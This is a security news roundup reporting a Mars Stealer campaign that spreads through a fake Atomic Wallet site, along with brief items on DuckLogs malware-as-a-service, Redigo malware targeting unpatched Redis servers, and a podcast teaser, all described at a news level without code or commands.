Threat actors have been distributing the Mars Stealer info-stealing malware through a phony website spoofing the widely-used decentralized wallet and cryptocurrency exchange portal Atomic Wallet, reports BleepingComputer.
Detection evasion measures have been implemented in the ongoing Mars Stealer campaign, which involves a ZIP file with the AtomicWallet-Setup.bat batch file prompting privilege escalation through a PowerShell command, a report from Cyble showed. The PowerShell executable is then copied, renamed, and hidden in the directory prior to the execution of a base64-encoded PowerShell content.
Researchers also found that the final PowerShell code serving as the malware loader facilitates the download of a Mars Stealer copy from a Discord server before deployment on targeted machines.
While the fake website was not an accurate replication of the legitimate Atomic Wallet site, its usage of official logos, marketing images, themes, and structure, as well as a contact form, FAQ section, and email address may deceive individuals who are unaware of the real site, according to the report.
This week, Dr. Doug raves about: 'The Orgy of the Walking Dead' or Elon is controlling my brain, Schoolyard Bully, Redigo, DuckLogs, Dod Alphabet soup, Sirius XM, Pixel Tracking, TSA, Single Sign-on rants, and more on the Security Weekly News!
Novel DuckLogs malware-as-a-service detailed More than 6,000 victims have been compromised by the new DuckLogs malware-as-a-service operation, whose platform is being leveraged by over 2,000 cybercriminals, according to BleepingComputer.
BleepingComputer reports that Redis servers that remain unpatched to CVE-2022-0543 are being compromised with the novel Go-based Redigo malware, which is not yet detected on VirusTotal antivirus engines.